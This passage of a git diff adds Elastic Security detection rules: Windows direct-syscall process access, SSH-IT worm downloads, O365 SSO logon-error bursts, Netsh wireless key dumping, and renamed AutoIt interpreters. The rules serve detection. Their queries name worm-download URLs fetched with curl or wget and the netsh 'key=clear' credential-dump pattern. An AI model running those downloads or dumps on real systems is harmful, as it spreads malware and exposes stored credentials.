"Suspicious Process Access via Direct System Call", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", + "references": [ + "https://twitter.com/SBousseaden/status/1278013896440324096", + "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 211 + }, + "id": "2dd480be-1263-4d9c-8672-172928f6789a_211", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_3.json b/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_3.json new file mode 100644 index 00000000000..6908eef25f3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_3.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies processes that are capable of downloading files with command line arguments containing URLs to SSH-IT's autonomous SSH worm. This worm intercepts outgoing SSH connections every time a user uses ssh.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential SSH-IT SSH Worm Downloaded", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name in (\"curl\", \"wget\") and process.args : (\n \"https://thc.org/ssh-it/x\", \"http://nossl.segfault.net/ssh-it-deploy.sh\", \"https://gsocket.io/x\",\n \"https://thc.org/ssh-it/bs\", \"http://nossl.segfault.net/bs\"\n)\n", + "references": [ + "https://www.thc.org/ssh-it/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2ddc468e-b39b-4f5b-9825-f3dcb0e998ea", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.004", + "name": "SSH", + "reference": "https://attack.mitre.org/techniques/T1021/004/" + } + ] + }, + { + "id": "T1563", + "name": "Remote Service Session Hijacking", + "reference": "https://attack.mitre.org/techniques/T1563/", + "subtechnique": [ + { + "id": "T1563.001", + "name": "SSH Hijacking", + "reference": "https://attack.mitre.org/techniques/T1563/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_104.json b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_104.json new file mode 100644 index 00000000000..a36767fd835 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_104.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies accounts with a high number of single sign-on (SSO) logon errors. Excessive logon errors may indicate an attempt to brute force a password or SSO token.", + "false_positives": [ + "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." + ], + "from": "now-20m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Excessive Single Sign-On Logon Errors", + "note": "", + "query": "event.dataset:o365.audit and event.provider:AzureActiveDirectory and event.category:authentication and o365.audit.LogonError:\"SsoArtifactInvalidOrExpired\"\n", + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.LogonError", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2de10e77-c144-4e69-afb7-344e7127abd0", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "user.id" + ], + "value": 5 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 104 + }, + "id": "2de10e77-c144-4e69-afb7-344e7127abd0_104", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_106.json b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_106.json new file mode 100644 index 00000000000..071b9f4335c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_106.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies accounts with a high number of single sign-on (SSO) logon errors. Excessive logon errors may indicate an attempt to brute force a password or SSO token.", + "false_positives": [ + "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." + ], + "from": "now-20m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Excessive Single Sign-On Logon Errors", + "note": "", + "query": "event.dataset:o365.audit and event.provider:AzureActiveDirectory and event.category:authentication and o365.audit.LogonError:\"SsoArtifactInvalidOrExpired\"\n", + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.LogonError", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2de10e77-c144-4e69-afb7-344e7127abd0", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "user.id" + ], + "value": 5 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 106 + }, + "id": "2de10e77-c144-4e69-afb7-344e7127abd0_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_207.json b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_207.json new file mode 100644 index 00000000000..b7f295cec18 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_207.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies accounts with a high number of single sign-on (SSO) logon errors. Excessive logon errors may indicate an attempt to brute force a password or SSO token.", + "false_positives": [ + "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." + ], + "from": "now-20m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Excessive Single Sign-On Logon Errors", + "note": "", + "query": "event.dataset:o365.audit and event.provider:AzureActiveDirectory and event.category:authentication and o365.audit.LogonError:\"SsoArtifactInvalidOrExpired\"\n", + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.LogonError", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2de10e77-c144-4e69-afb7-344e7127abd0", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "user.id" + ], + "value": 5 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 207 + }, + "id": "2de10e77-c144-4e69-afb7-344e7127abd0_207", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_8.json b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_8.json new file mode 100644 index 00000000000..e5f906bc219 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_8.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to dump Wireless saved access keys in clear text using the Windows built-in utility Netsh.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Wireless Credential Dumping using Netsh Command", + "note": "## Triage and analysis\n\n### Investigating Wireless Credential Dumping using Netsh Command\n\nNetsh is a Windows command line tool used for network configuration and troubleshooting. It enables the management of network settings and adapters, wireless network profiles, and other network-related tasks.\n\nThis rule looks for patterns used to dump credentials from wireless network profiles using Netsh, which can enable attackers to bring their own devices to the network.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"netsh.exe\" or ?process.pe.original_file_name == \"netsh.exe\") and\n process.args : \"wlan\" and process.args : \"key*clear\"\n", + "references": [ + "https://learn.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-contexts", + "https://www.geeksforgeeks.org/how-to-find-the-wi-fi-password-using-cmd-in-windows/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2de87d72-ee0c-43e2-b975-5f0b029ac600", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "2de87d72-ee0c-43e2-b975-5f0b029ac600_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_109.json b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_109.json new file mode 100644 index 00000000000..f9899117052 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_109.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious AutoIt process execution. Malware written as an AutoIt script tends to rename the AutoIt executable to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Renamed AutoIt Scripts Interpreter", + "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name : \"AutoIt*.exe\" and not process.name : \"AutoIt*.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: 